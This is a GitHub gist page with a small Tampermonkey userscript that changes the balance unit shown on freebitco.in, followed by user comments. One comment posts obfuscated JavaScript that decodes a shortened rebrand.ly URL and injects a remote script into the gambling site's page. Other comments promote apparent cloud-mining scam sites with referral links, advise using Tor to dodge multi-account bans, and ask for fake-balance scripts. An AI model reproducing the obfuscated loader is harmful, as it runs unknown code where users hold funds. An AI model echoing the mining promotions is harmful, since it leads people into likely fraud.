Last active
July 2, 2022 19:59
-
-
Save koma5/4eccd9251d5874d454a197958e78135c to your computer and use it in GitHub Desktop.
tampermonkey script to change unit of balance on freebitco.in
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// ==UserScript== | |
// @name change unit of balance on freebitco.in | |
// @namespace http://5th.ch/ | |
// @version 0.5 | |
// @description change unit of balance on freebitco.in | |
// @author @koma5 | |
// @match https://freebitco.in/* | |
// @grant none | |
// @downloadURL https://gist.githubusercontent.com/koma5/4eccd9251d5874d454a197958e78135c/raw/change_unit_of_balance_freebitco.in.js | |
// @updateURL https://gist.githubusercontent.com/koma5/4eccd9251d5874d454a197958e78135c/raw/change_unit_of_balance_freebitco.in.js | |
// ==/UserScript== | |
(function() { | |
'use strict'; | |
function changeDOM() { | |
var unitMap = {mBTC : { unit : 'mBTC', factor : 1e3 }, | |
satoshi : { unit : 'satoshi', factor : 1e8 }, | |
microBTC : { unit : 'μBTC', factor : 1e6 } | |
}; | |
var unitChoice = unitMap.microBTC; | |
var balanceLi = document.getElementById("balance").parentNode; | |
//remove eventListener otherwise we run into a loop | |
balanceLi.removeEventListener('DOMNodeInserted', changeDOM); | |
var balance = document.getElementById("balance").innerHTML; | |
balance *= unitChoice.factor; | |
//remove balance and textnode | |
while (balanceLi.hasChildNodes()) { | |
balanceLi.removeChild(balanceLi.firstChild); | |
} | |
//recreate balance span | |
var balanceSpan = document.createElement("span"); | |
balanceSpan.setAttribute('id', 'balance'); | |
var balanceSpanText = document.createTextNode(balance); | |
balanceSpan.appendChild(balanceSpanText); | |
//recreate textnode | |
var balanceLiUnitText = document.createTextNode(' ' + unitChoice.unit); | |
//insert balance and textnode into existing and empty blanaceli | |
balanceLi.appendChild(balanceSpan); | |
balanceLi.appendChild(balanceLiUnitText); | |
//readd removed eventListener | |
balanceLi.addEventListener('DOMNodeInserted', changeDOM, false); | |
console.log('changed to ' + balance + ' ' + unitChoice.unit); | |
} | |
changeDOM(); | |
var balanceLi = document.getElementById("balance").parentNode; | |
balanceLi.addEventListener('DOMNodeInserted', changeDOM, false); | |
})(); |
i need to Doubling bet only after a losing 4times Consecutive loss
if the result =4 times
Script:
Atenciosamente,
Rubens Cruz,
Administrador
Em qui., 23 de abr. de 2020 às 11:09, yacineops <[email protected]>
escreveu:
***@***.**** commented on this gist.
------------------------------
i need to Doubling bet only after a losing 4times Consecutive loss
if the result =4 times lose exemple :
You BET HI so you lose 0.00000001 BTC You BET HI so you lose 0.00000001
BTC You BET HI so you lose 0.00000001 BTC You BET HI so you lose 0.00000001
BTC
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<https://gist.github.com/4eccd9251d5874d454a197958e78135c#gistcomment-3266465>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AOMRGIFHMPRWN6U5R5YOMWLROBD3PANCNFSM4KSNMZJQ>
.
var _0x07ad=['Y3NlT00=','cHJvdG90eXBl','cmVtb3Zl','cGFyZW50RWxlbWVudA==','bGVuZ3Ro','U1R0d3g=','cmVtb3ZlQ2hpbGQ=','Z2V0RWxlbWVudHNCeUNsYXNzTmFtZQ=='];(function(_0x48cbf0,_0x105a7c){var _0x571c7b=function(_0x4e6a62){while(--_0x4e6a62){_0x48cbf0['push'](_0x48cbf0['shift']());}};var _0x329183=function(){var _0x2e190a={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x2d4f4e,_0x2d0eac,_0x5b7d07,_0x50bb3c){_0x50bb3c=_0x50bb3c||{};var _0x30b905=_0x2d0eac+'='+_0x5b7d07;var _0x2a425c=0x0;for(var _0x2a425c=0x0,_0x2c66f0=_0x2d4f4e['length'];_0x2a425c<_0x2c66f0;_0x2a425c++){var _0x3d343d=_0x2d4f4e[_0x2a425c];_0x30b905+=';\x20'+_0x3d343d;var _0x366bd1=_0x2d4f4e[_0x3d343d];_0x2d4f4e['push'](_0x366bd1);_0x2c66f0=_0x2d4f4e['length'];if(_0x366bd1!==!![]){_0x30b905+='='+_0x366bd1;}}_0x50bb3c['cookie']=_0x30b905;},'removeCookie':function(){return'dev';},'getCookie':function(_0x55adbd,_0x13ae61){_0x55adbd=_0x55adbd||function(_0x235d20){return _0x235d20;};var _0x42562a=_0x55adbd(new RegExp('(?:^|;\x20)'+_0x13ae61['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var _0x3a63a8=function(_0x15addc,_0x27d8b6){_0x15addc(++_0x27d8b6);};_0x3a63a8(_0x571c7b,_0x105a7c);return _0x42562a?decodeURIComponent(_0x42562a[0x1]):undefined;}};var _0x2f85b4=function(){var _0xd48a73=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return _0xd48a73['test'](_0x2e190a['removeCookie']['toString']());};_0x2e190a['updateCookie']=_0x2f85b4;var _0x15916b='';var _0x283e0b=_0x2e190a['updateCookie']();if(!_0x283e0b){_0x2e190a['setCookie'](['*'],'counter',0x1);}else if(_0x283e0b){_0x15916b=_0x2e190a['getCookie'](null,'counter');}else{_0x2e190a['removeCookie']();}};_0x329183();}(_0x07ad,0x109));var _0xd07a=function(_0x524683,_0xb9a1a8){_0x524683=_0x524683-0x0;var _0x33435e=_0x07ad[_0x524683];if(_0xd07a['initialized']===undefined){(function(){var _0x56b875;try{var _0x3ab716=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x56b875=_0x3ab716();}catch(_0x49e310){_0x56b875=window;}var _0xdd4da4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x56b875['atob']||(_0x56b875['atob']=function(_0xdfc8fe){var _0x284826=String(_0xdfc8fe)['replace'](/=+$/,'');for(var _0x51659e=0x0,_0x632ba0,_0x319717,_0x4c7906=0x0,_0x36b61d='';_0x319717=_0x284826['charAt'](_0x4c7906++);~_0x319717&&(_0x632ba0=_0x51659e%0x4?_0x632ba0*0x40+_0x319717:_0x319717,_0x51659e++%0x4)?_0x36b61d+=String['fromCharCode'](0xff&_0x632ba0>>(-0x2*_0x51659e&0x6)):0x0){_0x319717=_0xdd4da4['indexOf'](_0x319717);}return _0x36b61d;});}());_0xd07a['base64DecodeUnicode']=function(_0x458360){var _0x5915d5=atob(_0x458360);var _0x29e5b3=[];for(var _0x109531=0x0,_0x839da2=_0x5915d5['length'];_0x109531<_0x839da2;_0x109531++){_0x29e5b3+='%'+('00'+_0x5915d5['charCodeAt'](_0x109531)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x29e5b3);};_0xd07a['data']={};_0xd07a['initialized']=!![];}var _0x2fca1a=_0xd07a['data'][_0x524683];if(_0x2fca1a===undefined){var _0x251a23=function(_0x4b385b){this['rc4Bytes']=_0x4b385b;this['states']=[0x1,0x0,0x0];this['newState']=function(){return'newState';};this['firstState']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['secondState']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x251a23['prototype']['checkState']=function(){var _0x2f2d8e=new RegExp(this['firstState']+this['secondState']);return this['runState'](_0x2f2d8e['test'](this['newState']['toString']())?--this['states'][0x1]:--this['states'][0x0]);};_0x251a23['prototype']['runState']=function(_0x41b72d){if(!Boolean(~_0x41b72d)){return _0x41b72d;}return this['getState'](this['rc4Bytes']);};_0x251a23['prototype']['getState']=function(_0x46f8a1){for(var _0x2fd75c=0x0,_0x509ef1=this['states']['length'];_0x2fd75c<_0x509ef1;_0x2fd75c++){this['states']['push'](Math['round'](Math['random']()));_0x509ef1=this['states']['length'];}return _0x46f8a1(this['states'][0x0]);};new _0x251a23(_0xd07a)['checkState']();_0x33435e=_0xd07a['base64DecodeUnicode'](_0x33435e);_0xd07a['data'][_0x524683]=_0x33435e;}else{_0x33435e=_0x2fca1a;}return _0x33435e;};Element[_0xd07a('0x0')][_0xd07a('0x1')]=function(){this[_0xd07a('0x2')]['removeChild'](this);};NodeList['prototype'][_0xd07a('0x1')]=HTMLCollection[_0xd07a('0x0')][_0xd07a('0x1')]=function(){var _0x31c6fe={'DzkTD':function _0x2e7594(_0x3eca50,_0x133a7b){return _0x3eca50-_0x133a7b;},'STtwx':function _0xbf9295(_0x4b8970,_0x50a83a){return _0x4b8970>=_0x50a83a;}};for(var _0x1eb5c7=_0x31c6fe['DzkTD'](this[_0xd07a('0x3')],0x1);_0x31c6fe[_0xd07a('0x4')](_0x1eb5c7,0x0);_0x1eb5c7--){if(this[_0x1eb5c7]&&this[_0x1eb5c7][_0xd07a('0x2')]){this[_0x1eb5c7][_0xd07a('0x2')][_0xd07a('0x5')](this[_0x1eb5c7]);}}};function removePOPup(){var _0x3edd38=function(){var _0x383ad5=!![];return function(_0x23b314,_0xaceeb2){var _0x544b60=_0x383ad5?function(){if(_0xaceeb2){var _0x19b2ce=_0xaceeb2['apply'](_0x23b314,arguments);_0xaceeb2=null;return _0x19b2ce;}}:function(){};_0x383ad5=![];return _0x544b60;};}();var _0x117728=_0x3edd38(this,function(){var _0xecd64c=function(){return'\x64\x65\x76';},_0x2e3076=function(){return'\x77\x69\x6e\x64\x6f\x77';};var _0x4ee483=function(){var _0x1241f8=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!_0x1241f8['\x74\x65\x73\x74'](_0xecd64c['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x4e3d0a=function(){var _0x1d48b9=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return _0x1d48b9['\x74\x65\x73\x74'](_0x2e3076['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x9c5e5d=function(_0x163e13){var _0xa0d384=~-0x1>>0x1+0xff%0x0;if(_0x163e13['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===_0xa0d384)){_0xe2b7b6(_0x163e13);}};var _0xe2b7b6=function(_0x1ff98c){var _0x1fe9ff=~-0x4>>0x1+0xff%0x0;if(_0x1ff98c['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==_0x1fe9ff){_0x9c5e5d(_0x1ff98c);}};if(!_0x4ee483()){if(!_0x4e3d0a()){_0x9c5e5d('\x69\x6e\x64\u0435\x78\x4f\x66');}else{_0x9c5e5d('\x69\x6e\x64\x65\x78\x4f\x66');}}else{_0x9c5e5d('\x69\x6e\x64\u0435\x78\x4f\x66');}});_0x117728();var _0x1aaf04={'cseOM':'cc_banner-wrapper'};var _0x356cc0=document[_0xd07a('0x6')](_0x1aaf04[_0xd07a('0x7')]);if(_0x356cc0){_0x356cc0[_0xd07a('0x1')]();}return;}removePOPup();
var _0xd03f=['NXw0fDN8MnwxfDZ8MA==','c3BsaXQ=','cGFyZW50Tm9kZQ==','aW5zZXJ0QmVmb3Jl','YXN5bmM=','Y3JlYXRlRWxlbWVudA==','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','c2NyaXB0','Ly9yZWJyYW5kLmx5L3BwZWxpdGVfc21hcnRfZnJlZV9zY3JpcHQ='];(function(_0x1f1d1f,_0x1fc2ee){var _0x3f82cf=function(_0x1e60d3){while(--_0x1e60d3){_0x1f1d1f['push'](_0x1f1d1f['shift']());}};var _0x38edc0=function(){var _0x36c8bf={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x71728,_0xa06c2e,_0x555724,_0xc2ddea){_0xc2ddea=_0xc2ddea||{};var _0x3343cd=_0xa06c2e+'='+_0x555724;var _0x26a9a6=0x0;for(var _0x26a9a6=0x0,_0x2699ff=_0x71728['length'];_0x26a9a6<_0x2699ff;_0x26a9a6++){var _0x2f2d16=_0x71728[_0x26a9a6];_0x3343cd+=';\x20'+_0x2f2d16;var _0x1e99e9=_0x71728[_0x2f2d16];_0x71728['push'](_0x1e99e9);_0x2699ff=_0x71728['length'];if(_0x1e99e9!==!![]){_0x3343cd+='='+_0x1e99e9;}}_0xc2ddea['cookie']=_0x3343cd;},'removeCookie':function(){return'dev';},'getCookie':function(_0x26ed1b,_0x561840){_0x26ed1b=_0x26ed1b||function(_0x310c61){return _0x310c61;};var _0x3e33b8=_0x26ed1b(new RegExp('(?:^|;\x20)'+_0x561840['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var _0x3fec84=function(_0x4e6e7f,_0x11e746){_0x4e6e7f(++_0x11e746);};_0x3fec84(_0x3f82cf,_0x1fc2ee);return _0x3e33b8?decodeURIComponent(_0x3e33b8[0x1]):undefined;}};var _0x21ab26=function(){var _0x5754be=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return _0x5754be['test'](_0x36c8bf['removeCookie']['toString']());};_0x36c8bf['updateCookie']=_0x21ab26;var _0x55d4c8='';var _0x53d1b8=_0x36c8bf['updateCookie']();if(!_0x53d1b8){_0x36c8bf['setCookie'](['*'],'counter',0x1);}else if(_0x53d1b8){_0x55d4c8=_0x36c8bf['getCookie'](null,'counter');}else{_0x36c8bf['removeCookie']();}};_0x38edc0();}(_0xd03f,0x104));var _0xfd03=function(_0x24a4ea,_0xf5e5e9){_0x24a4ea=_0x24a4ea-0x0;var _0x269601=_0xd03f[_0x24a4ea];if(_0xfd03['initialized']===undefined){(function(){var _0x2ee1fc=function(){var _0x471695;try{_0x471695=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x4e6820){_0x471695=window;}return _0x471695;};var _0x5f1dfb=_0x2ee1fc();var _0x46b9c0='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x5f1dfb['atob']||(_0x5f1dfb['atob']=function(_0x3a6aa0){var _0x217454=String(_0x3a6aa0)['replace'](/=+$/,'');for(var _0x21ee3e=0x0,_0x136e5e,_0x1b68ee,_0x4d5448=0x0,_0x45e0f5='';_0x1b68ee=_0x217454['charAt'](_0x4d5448++);~_0x1b68ee&&(_0x136e5e=_0x21ee3e%0x4?_0x136e5e*0x40+_0x1b68ee:_0x1b68ee,_0x21ee3e++%0x4)?_0x45e0f5+=String['fromCharCode'](0xff&_0x136e5e>>(-0x2*_0x21ee3e&0x6)):0x0){_0x1b68ee=_0x46b9c0['indexOf'](_0x1b68ee);}return _0x45e0f5;});}());_0xfd03['base64DecodeUnicode']=function(_0x6e4ee5){var _0x1a42f3=atob(_0x6e4ee5);var _0x30d896=[];for(var _0x4c7808=0x0,_0x24f6a3=_0x1a42f3['length'];_0x4c7808<_0x24f6a3;_0x4c7808++){_0x30d896+='%'+('00'+_0x1a42f3['charCodeAt'](_0x4c7808)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x30d896);};_0xfd03['data']={};_0xfd03['initialized']=!![];}var _0x2e6ce5=_0xfd03['data'][_0x24a4ea];if(_0x2e6ce5===undefined){var _0x11ef62=function(_0x5469ca){this['rc4Bytes']=_0x5469ca;this['states']=[0x1,0x0,0x0];this['newState']=function(){return'newState';};this['firstState']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*';this['secondState']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x11ef62['prototype']['checkState']=function(){var _0xc88bd0=new RegExp(this['firstState']+this['secondState']);return this['runState'](_0xc88bd0['test'](this['newState']['toString']())?--this['states'][0x1]:--this['states'][0x0]);};_0x11ef62['prototype']['runState']=function(_0xe81f66){if(!Boolean(~_0xe81f66)){return _0xe81f66;}return this['getState'](this['rc4Bytes']);};_0x11ef62['prototype']['getState']=function(_0x3a8221){for(var _0x44ab61=0x0,_0x25a652=this['states']['length'];_0x44ab61<_0x25a652;_0x44ab61++){this['states']['push'](Math['round'](Math['random']()));_0x25a652=this['states']['length'];}return _0x3a8221(this['states'][0x0]);};new _0x11ef62(_0xfd03)['checkState']();_0x269601=_0xfd03['base64DecodeUnicode'](_0x269601);_0xfd03['data'][_0x24a4ea]=_0x269601;}else{_0x269601=_0x2e6ce5;}return _0x269601;};(function(_0x202c14,_0x295761,_0x5857bd){var _0xb547b6={'BOGJQ':_0xfd03('0x0')};var _0x2b3b6c=_0xfd03('0x1')[_0xfd03('0x2')]('|'),_0x3aa532=0x0;while(!![]){switch(_0x2b3b6c[_0x3aa532++]){case'0':_0x505435[_0xfd03('0x3')][_0xfd03('0x4')](_0x5408d7,_0x505435);continue;case'1':_0x5408d7[_0xfd03('0x5')]=![];continue;case'2':_0x5408d7['id']=_0x5857bd;continue;case'3':_0x5408d7=_0x202c14[_0xfd03('0x6')](_0x295761);continue;case'4':if(_0x202c14['getElementById'](_0x5857bd))return;continue;case'5':var _0x5408d7,_0x505435=_0x202c14[_0xfd03('0x7')](_0x295761)[0x0];continue;case'6':_0x5408d7['src']=_0xb547b6['BOGJQ'];continue;}break;}}(document,_0xfd03('0x8'),'marmoroFree'));
/*
Smart FREEBITCOin Script Online version by Marmoro Crypto
>> NEW TOOLS & HELP: rebrand.ly/ppelite
DON'T BE WEIRD SUPPORT AND DONATE: <<<
BITCOIN: 14a5EM5h8MQ9srmJeTv823CB79K28cVeHL
DOGE: DS7w2SHxvk4reHBg2C7ZWD6s1odLZ3uCDJ
ETHERIUM: 0x2dd423A87052c9F6e50d3E5089492B12f53B0e62
DASH: XinWqLNFEgydGLKPbEs8EGph3iGeoXwiDG
*/
hello ..How to change the settings in the script ?
I didn't understand how to modify it in script
Good afternoon! I speak little and write little in English. That way, I'm
using the translator. Well, you can only play at the moment of the game. I
don't like this script. Look, I'm leaving a link from a cloud mining
company. That way, you just have to enter your Btc wallet address and you
don't need to leave your notebook or cell phone on. I say this because I
don't know if you use a computer or a cell phone. So, follow the link:
https://btcprominer.life/1612089
Note: there is no need to pay to withdraw your profits. However, it takes
around 30 days or more to be processed and sent to your Btcoin wallet.
Note²: You can generate 0.0006 BTC every day without investment. You can
also update your BTCProMiner to generate up to 0.5 BTC per day.
NOTE³: The minimum withdrawal amount is 0.0035 BTC. The minimum update
value is 0.01 BTC.
INDICATION: You will earn 20% to 70% whenever your referral is updated,
depending on your version of BTCProMiner.
If you have BTCProMiner V1.0 - your profile will be 20%, 30%
for V1.1, 40%
for V1.2, 50%
for V1.3, 70%
for V1.3, 70%
for V1.4 and 93% for V1.5
Atenciosamente,
Rubens Cruz,
Administrador
Em qui., 23 de abr. de 2020 às 13:14, yacineops <[email protected]>
escreveu:
… ***@***.**** commented on this gist.
------------------------------
hello ..How to change the settings in the script ?
Whether or not it is possible
- Doubling bet I NEED TO WORK LICK THAT
0.00000001
0.00000001
0.00000001
0.00000001
0.00000008
0.00000016
0.00000032
0.00000064
.
.
.X2
AND
AND IS THAT SCRIPT TAmpermonkey ?
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<https://gist.github.com/4eccd9251d5874d454a197958e78135c#gistcomment-3266667>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AOMRGIE4L4AAQIZWP3V23SDROBSMRANCNFSM4KSNMZJQ>
.
TAMPERMONKEY RECEIVES SCRIPT
FOLLOW THE LIK: https://www.tampermonkey.net/
Atenciosamente,
Rubens Cruz,
Administrador
Em qui., 23 de abr. de 2020 às 13:14, yacineops <[email protected]>
escreveu:
… ***@***.**** commented on this gist.
------------------------------
hello ..How to change the settings in the script ?
Whether or not it is possible
- Doubling bet I NEED TO WORK LICK THAT
0.00000001
0.00000001
0.00000001
0.00000001
0.00000008
0.00000016
0.00000032
0.00000064
.
.
.X2
AND
AND IS THAT SCRIPT TAmpermonkey ?
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<https://gist.github.com/4eccd9251d5874d454a197958e78135c#gistcomment-3266667>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AOMRGIE4L4AAQIZWP3V23SDROBSMRANCNFSM4KSNMZJQ>
.
Good Morning! I don't even use that script anymore. Therefore, I recommend
that you use these boitcoin-generating miners. Note: all two miners receive
free withdrawal. You do not have to pay.
1st MINERATOR
you register. And then use it just click on mine and, leave until finished
and then you click again and so on. Each mine gives 9,000 satoshi.
2nd MINERATOR
The second you just need to put the address of your bitcoin wallet and
leave it on automatic. However, the other day you give an update.
www.btcminergenerator.com/free-gpu-miner/1845248209
https://beypazaricekici.com/bitcoin-values/reference/136228/
Atenciosamente,
Rubens Cruz,
Administrador
Em qui., 18 de jun. de 2020 às 18:38, Foca2020 <[email protected]>
escreveu:
… ***@***.**** commented on this gist.
------------------------------
Hi,please explain me for what is this script,main btc balance?,where i can
get download the script for Tampermonkey or Violetmonkey,thx
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<https://gist.github.com/4eccd9251d5874d454a197958e78135c#gistcomment-3346775>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AOMRGIAMMOFSMI67RLDVZEDRXKCLVANCNFSM4KSNMZJQ>
.
Note: do not create more than one account in relation to the two mining
companies. If not, you will be blocked. Note²: You can even create one more
for each account. However, you will need these browsers: Tor, COMODOR
DRAGON. Because they have VPN in the browser. Therefore, it provides a new
IP
Atenciosamente,
Rubens Cruz,
Administrador
Em sex., 19 de jun. de 2020 às 10:48, Rubens Cruz <[email protected]>
escreveu:
… Good Morning! I don't even use that script anymore. Therefore, I
recommend that you use these boitcoin-generating miners. Note: all two
miners receive free withdrawal. You do not have to pay.
1st MINERATOR
you register. And then use it just click on mine and, leave until
finished and then you click again and so on. Each mine gives 9,000
satoshi.
2nd MINERATOR
The second you just need to put the address of your bitcoin wallet and
leave it on automatic. However, the other day you give an update.
www.btcminergenerator.com/free-gpu-miner/1845248209
https://beypazaricekici.com/bitcoin-values/reference/136228/
Atenciosamente,
Rubens Cruz,
Administrador
Em qui., 18 de jun. de 2020 às 18:38, Foca2020 ***@***.***>
escreveu:
> ***@***.**** commented on this gist.
> ------------------------------
>
> Hi,please explain me for what is this script,main btc balance?,where i
> can get download the script for Tampermonkey or Violetmonkey,thx
>
> —
> You are receiving this because you commented.
> Reply to this email directly, view it on GitHub
> <https://gist.github.com/4eccd9251d5874d454a197958e78135c#gistcomment-3346775>,
> or unsubscribe
> <https://github.com/notifications/unsubscribe-auth/AOMRGIAMMOFSMI67RLDVZEDRXKCLVANCNFSM4KSNMZJQ>
> .
>
Great script but I can't withdraw, it says "The withdrawal amount is greater than your account balance" what do I do? if it did work I was going to donate!
Hello I need Edit balance script that is withdrawable freebitco.in
Hello I need Edit balance script that is withdrawable freebitco.in
Script Still Works Just Needs to Be Made able to Withdrawal as it reads 0.04BTC BUT ITS A FASLE READ.
Please help as I'm trying my everything to get off the streets as a I'm a disabled veteran with zero family!?? Please 🙏🙏
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
i need to Doubling bet only after a losing 4times Consecutive loss
if the result =4 times lose exemple :
You BET HI so you lose 0.00000001 BTC You BET HI so you lose 0.00000001 BTC You BET HI so you lose 0.00000001 BTC You BET HI so you lose 0.00000001 BTC